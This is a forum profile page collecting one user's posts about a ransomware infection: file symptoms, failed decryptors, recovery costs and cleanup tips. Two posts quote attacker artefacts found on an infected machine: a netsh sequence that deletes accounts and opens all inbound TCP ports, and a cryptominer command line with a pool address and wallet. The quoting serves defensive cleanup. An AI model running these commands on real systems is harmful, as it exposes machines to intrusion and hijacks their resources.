Jump to content


  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by ganymede

  1. Sounds like some sort of syndicate. Ransomware-as-a-service? Could you explain that a little more? When you say anyone can get their own ransomware, do you mean get the app/whatever that initiates the encryption on other machines?
  2. Never mind, apparently it works in Windows 7 at least. Didn't accept my .onion files as being compatible though. :/
  3. I double click the exe inside and nothing happens. That was disappointing...
  4. People need to understand that this forum is hosted by Emsisoft, a company selling anti-malware tools etc. They cannot endorse anything as a solution to this ransomware other than their software (or perhaps some other application from a digitally verified source), if for no other reason than corporate liability. No offense to anyone here trying to help, but if you want to "go rogue", I suggest starting a thread on Bleeping Computer. Knowledge sharing is always welcome though. Sounds to me like the folks here have done all they can with the info at hand. All we can do now is wait and hope people stop paying the ransom so the criminals get bored or something and leak info.
  5. People are unofficially calling it Cry36, not to be confused with Cry128. You may want to ask Emsisoft folks to see if they have a name for it though.
  6. so you think they blocked port 445 so that our systems wouldn't be infected with wannacry? we must have been the "expeditionary front" of the wannacry plague to test it out before launching it en masse.
  7. @NnitehawkK-fb, thanks for posting that. It's a script that the hacker ran to open up a bunch of vulnerabilities on your machine, so now I know where to look to plug all the holes. For example, go to the command prompt and type `netsh ipsec static show all` and likely there will be a bunch of filters and whatnot listed that you'll want to remove. Another place you'll want to go to remove stuff is in the windows firewall with advanced security snap-in to take out the tcp-all rule et al. here're the commands cleaned up: C:\WINDOWS\system32>ping -n 10 C:\WINDOWS\system32>net1 user IISUSER$ /del & net1 user IUSR_Servs /del C:\WINDOWS\system32>sc config MpsSvc start= auto & net start MpsSvc C:\WINDOWS\system32>netsh advfirewall set allprofiles state on C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow C:\WINDOWS\system32>netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow C:\WINDOWS\system32>netsh ipsec static add policy name=win C:\WINDOWS\system32>netsh ipsec static add filterlist name=Allowlist C:\WINDOWS\system32>netsh ipsec static add filterlist name=denylist C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 C:\WINDOWS\system32>netsh ipsec static add filteraction name=Allow action=permit Something curious -- why would they want to deny inbound port 445? Seems like that would be a precautionary thing.
  8. Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.
  9. Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.
  10. Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore peoples' files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand? For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~2000$, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted. If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!
  11. I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs: winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows Maybe that long nonsense string has something to do with the key?
  12. George, I'm not sure those bytes are meant to be constant. My last 4 in each file are 35 F6 5C 01. Also to Kenneth and mclaugb, you may have different variants than the one being discussed here, as your extensions end in .onion._. Those were linked to Cry128. Have you tried using the decrypter for it?
  13. Confirmed. Also, and this is probably a "duh, obviously" thing to mention, but check your Windows firewall with advanced security, inbound rules. I was in there whitelisting my RDP ports and noticed that the *&^%$! opened up all ports for tcp connections.
  14. yeah I noticed that some of my picture files (jpg & png) were renamed yet unencrypted too. I wasn't sure if it had to do with the extension or if maybe the virus renamed everything first and then went to encrypting. I would love to try renaming my files back en masse, but I literally have millions of files and I don't want to rename the ones that are actually encrypted because the decrypter won't recognize them then.
  15. I've confirmed the Cry128 decryptor does not work for me either. I tried on 3 sets of files (exe, pdf, and txt) and they all attempted to crack it, but then gave that pop up saying it couldn't be found. I found 3 malicious executables on my machine, but unfortunately I don't think any of them are the actual virus we're dealing with... I think the criminal just put them on the machine. Going through Windows event logs, the actual executable doing the damage was being run through a windows service "Workstationt" and it was running c:\windows\fonts\winlogon.exe -- and this is the file I failed to retrieve. Just before the exe was wiped (by me doing a system restore... and I'm kicking myself for being so hasty about it), Malwarebytes detected winlogon.exe as RiskWare.HeuristicsReservedWordExploit. I can still provide the other 3 executables if you think they will help, though I don't want to give anyone a red herring.
  16. Hello, Hit sometime last night or this morning, likeliest vector is RDP (though I use strong passwords >:( ). It appears to be the same flavor as bruticus0's given the filenames. Encrypted files have .onion extensions and are 36 bytes larger than the original file. The attached example is an ASCII file, but I can provide a binary if needed. Please note that I got the original by downloading a previous version that was maintained by Google drive. Google drive had named the file "mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc.id_1726307421_fgb45ft3pqamyji7.onion.desc" which wasn't the original name and so I renamed it to what you see attached. Hopefully that doesn't mess anything up for your analysis. I believe people are dubbing this one Cry128? I caught the trojan in the act and turned off the machine, so I'll likely be able to provide the virus files tomorrow. Where should I submit those? I've tried the Cry9 and CryptOn decryptors and neither worked. The former complained about the 68 bytes as others have posted, the latter gave a popup saying I need to drag both files at the same time (but I definitely did). More info... ransom notes are -DECRYPT-MY-FILES.txt and are *not* in every directory. Possibly because like I said I caught it "mid-stream". They make no mention of the culprit (e.g. citing the nemesis decryptor), however I safely visited the url given in the note and it said clearly at the top, "NEMESIS Ransomware". Also, in some threads I've been reading, some people have noted no size difference. I've checked several of my files by removing the new extension to bring it back to its original file name, and several of the files were still accessible, i.e. not encrypted. Perhaps if you're seeing no file size difference you should try the same. For me, the files that were apparently unencrypted still had the extra 36 bytes though. I can provide these kinds of files too if desired. Along with the virus exe and supporting files, I will be looking for new/altered user accounts, altered local/group security policies, and checking logs for port accesses and anything else that stands out. Let me know if I should look for anything else. And definitely let me know whatever I can do to help this effort. I'm reposting this on bleepingcomputer.com forum now - https://www.bleepingcomputer.com/forums/t/636865/nemesis-ransomware-support-help-topic/page-4 Many thanks to everyone spending their well-earned free time on cracking down on these <expletive deleted>. -DECRYPT-MY-FILES.txt mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc mc-generated_tgp1_tbp1_tsr0.667_tmc9_trainset.txt.unified.desc.id_1726307421_fgb45ft3pqamyji7.onion
  • Create New...